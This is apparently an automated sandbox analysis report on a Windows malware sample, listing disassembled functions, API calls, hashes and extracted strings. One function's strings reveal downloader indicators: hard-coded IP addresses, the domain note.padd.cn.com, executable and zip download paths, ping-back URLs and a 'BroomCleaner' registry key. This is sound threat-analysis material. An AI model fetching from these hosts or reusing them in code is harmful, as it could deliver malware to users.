Snapshot File: hcaresult_0_2_41e5000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 7fd5b1669d842760ddf6aee63c808eaec61c66d0a7175d9e7822d7626bb9b16c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: AA113C79A00208FFDB01DF99CA85E98BBF5AF08751F058094FA489B362D371EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04164C75 Relevance: 48.5, APIs: 2, Strings: 25, Instructions: 1237COMMON

Download Yara Rule

APIs

Part of subcall function 04166823: __EH_prolog.LIBCMT ref: 04166828

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 04164D3B

Part of subcall function 041662B1: __EH_prolog.LIBCMT ref: 041662B6
Part of subcall function 041662B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 04166398

Strings

.exe, xrefs: 04165B18, 04165B3A
185.172.128.59, xrefs: 041657A3, 0416583D, 04165AB4
\run.exe, xrefs: 04165E37, 04165E8F
Installed, xrefs: 04165466, 041654C4
185.172.128.90, xrefs: 0416521A, 041652B4, 04165302
.exe, xrefs: 0416618D, 041661AF
note.padd.cn.com, xrefs: 04165BA9, 04165C61, 04165D66
P, xrefs: 0416614A
P, xrefs: 0416575C
.zip, xrefs: 04165DC4, 04165DE6
P, xrefs: 04165ABC
/BroomSetup.exe, xrefs: 0416604E, 041660F4, 04166142
185.172.128.228, xrefs: 04165527, 041655CD, 0416574C
/syncUpd.exe, xrefs: 04165923, 041659A5, 04165AD6
iC, xrefs: 04165E24
185.172.128.228, xrefs: 04165F88, 04166034, 04166139
/timeSync.exe, xrefs: 041659C6, 04165A59, 04165AC7
/1/Package.zip, xrefs: 04165C7B, 04165D15, 04165D6F
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 0416501D, 041651B3, 041651CC
185.172.128.203, xrefs: 0416585E, 04165904, 04165AA6
SOFTWARE\BroomCleaner, xrefs: 04165358, 0416544C
P, xrefs: 04165312
/ping.php?substr=%s, xrefs: 041655EE, 041656C4, 041656DC
P, xrefs: 04165D77
@, xrefs: 04164CE3

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
API String ID: 2531350358-3920416335
Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction ID: 96a96a0061578520eb79de5e64c552fc9406ab7b8c75acb49665a63cd9182ee2
Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction Fuzzy Hash: 29A2571070B2D57EE751B77C58A63CE2BE09B93244FD474A9C6B85B323CB54A20C87DA

Uniqueness

Uniqueness Score: -1.00%

Function 0042086B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetUserDefaultLCID.KERNEL32 ref: 00420977
IsValidCodePage.KERNEL32(00000000), ref: 004209D2
IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00420A48

Strings

,CUSA, xrefs: 004208D0

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: ,CUSA
API String ID: 745075371-2978500865
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042140C Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00421552

Strings

1#IND, xrefs: 0042274A
1#INF, xrefs: 0042275F
1#SNAN, xrefs: 00422751
1#QNAN, xrefs: 00422758

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction ID: ba3d8f5800837f2e7df06b198bc907b13d59b0e20819b9a43c463b3a9b279e29
Opcode Fuzzy Hash: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction Fuzzy Hash: 04C25A71E082289FDB25CE28ED407EAB7B5EB94304F5541EBD84DE7250E778AE818F44

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF33 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

IsValidCodePage.KERNEL32(00000000), ref: 00420015
_wcschr.LIBVCRUNTIME ref: 004200A5
_wcschr.LIBVCRUNTIME ref: 004200B3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00420156

Strings

,CUSA, xrefs: 0041FF71

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: ,CUSA
API String ID: 4212172061-2978500865
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769

Uniqueness

Uniqueness Score: -1.00%

Function 00420697 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00420730
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00420759
GetACP.KERNEL32 ref: 0042076E

Strings

OCP, xrefs: 004206EB
ACP, xrefs: 004206B5

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 041608FE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 04160997
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 041609C0
GetACP.KERNEL32 ref: 041609D5

Strings

OCP, xrefs: 04160952
ACP, xrefs: 0416091C

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: 3e6a1382cbfbf8c2e767a909d49958cb46a8ad65afbfe1e86ee67d411d432272
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 44219722741105AAF734CF55C991BA77BA7EB48A64B4784A4EA4FD7100E732EE51C390

Uniqueness

Uniqueness Score: -1.00%

Function 04160AD2 Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE

Part of subcall function 04156F80: _free.LIBCMT ref: 04156FDF
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FEC

GetUserDefaultLCID.KERNEL32 ref: 04160BDE
IsValidCodePage.KERNEL32(00000000), ref: 04160C39
IsValidLocale.KERNEL32(?,00000001), ref: 04160C48
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 04160C90
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 04160CAF

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 84294c56df2ea4a31a09f17cba6e3a7d93780644158b516937c2140b79823c4c
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: D6518575A002159BEB20DFA5DC84ABE7BBCEF08704F0485A9E916E7190E771E910CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004123A0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

y%B, xrefs: 004123BD, 00412568, 0041278C, 00412726, 004125B6, 00412544
y%B, xrefs: 00412808, 004125F2, 00412481

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID: y%B$y%B
API String ID: 0-2510245575
Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 0416019A Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE

IsValidCodePage.KERNEL32(00000000), ref: 0416027C
_wcschr.LIBVCRUNTIME ref: 0416030C
_wcschr.LIBVCRUNTIME ref: 0416031A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 041603BD

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: f093912217bd0cc2c0a1a40a1684d49d67d119bed45ff919d189ca5cf4edb246
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 81610772600206ABE725EF74CCC1BAA7BACEF0C304F14446AE95AD7190EB70F951C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0042031E Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
Opcode Fuzzy Hash: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041073B Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88

Uniqueness

Uniqueness Score: -1.00%

Function 041509A2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 04150A9A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 04150AA4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 04150AB1

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: cdd487c89eaf038454d57bf24501fde9c040af8dca135c0fc89d7bff390e9762
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: 6831B2B494122CDBCF21DF64D988799BBB4BF48310F5041EAE81CA7260E730AB858F55

Uniqueness

Uniqueness Score: -1.00%

Function 04153C4E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,04153C24,00000003,00438DB0,0000000C,04153D7B,00000003,00000002,00000000,?,04152DD2,00000003), ref: 04153C6F
TerminateProcess.KERNEL32(00000000,?,04153C24,00000003,00438DB0,0000000C,04153D7B,00000003,00000002,00000000,?,04152DD2,00000003), ref: 04153C76
ExitProcess.KERNEL32 ref: 04153C88

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 4f5e94172af6ad61c2466a62b1e62f7fa5ca43a9b8ae2a3a3bae855fee8148a5
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 3CE0463110010DEBCF226F64CE4CA993F39EB44285F408029FD2A8B231CB35EE62CA84

Uniqueness

Uniqueness Score: -1.00%

Function 0414092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0414095F
l, xrefs: 04140966
GetProcAddress., xrefs: 041409DC, 041409DF, 041409E4

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: e3c758e8dcecefb8623dba5f8633c0ab786f3d83586aa24f252eef9d42c9f75e
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 873128B6910609DFEB10CF99C880BAEBBF5FF48324F15408AD545A7350D771EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004174E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537

Strings

GetLocaleInfoEx, xrefs: 004174F5, 004174FF

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D

Uniqueness

Uniqueness Score: -1.00%

Function 04152607 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction ID: 7910d2421fc546f411c06c7753803acbe34ab87186523b29efbc1145b0a95cdd
Opcode Fuzzy Hash: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction Fuzzy Hash: 23020972E00219DBDF24CFA9D8806EDB7F1EF88314F1582A9D829EB354D731A9418F90

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7FC Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 0040C823
@, xrefs: 0040C843

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: bacc100dc0a0088e2915408729627ff8f5d38c09acb905e5d4049eb219c2e84e
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: 9E314B67144182CBD2049728C8E45B7B781FA8532272DC3FBD091AB7CAD23E9847960C

Uniqueness

Uniqueness Score: -1.00%

Function 0414CA63 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 0414CA8A
@, xrefs: 0414CAAA

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: 42690012d3296e6fcf3d309373c87aa6a54220f18d21174456ec1e65cdc29314
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: C4315A762461824BC315CB2DD8F81B6B781FBC6260B2E83E9D0858F24AF366A446C749

Uniqueness

Uniqueness Score: -1.00%

Function 0041B722 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B71D,?,?,00000008,?,?,004234FF,00000000), ref: 0041B94F

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: 77e1d80032caf57d447ccd467e54c4f0879ce58ba2590176158d9b4cb40e0a8d
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: F4B13C71620608DFD715CF28C48ABA57BE0FF45364F298659E999CF3A1C339D982CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0415B989 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,0415B984,00000000,?,00000008,?,?,04163766,00000000), ref: 0415BBB6

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: 3caf1124b6e56d8476ffb039f730e3c67bd73d18cbd4cd93e2438bf875e24f3e
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: 94B12931614608DFD719CF28C4C6BA57BA0FF45364F258698E8AACF2A1C775FA81CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0042056E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59

Uniqueness

Uniqueness Score: -1.00%

Function 041607D5 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 04156F80: GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
Part of subcall function 04156F80: _free.LIBCMT ref: 04156FB7
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FF8
Part of subcall function 04156F80: _abort.LIBCMT ref: 04156FFE

Part of subcall function 04156F80: _free.LIBCMT ref: 04156FDF
Part of subcall function 04156F80: SetLastError.KERNEL32(00000000), ref: 04156FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 04160829

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
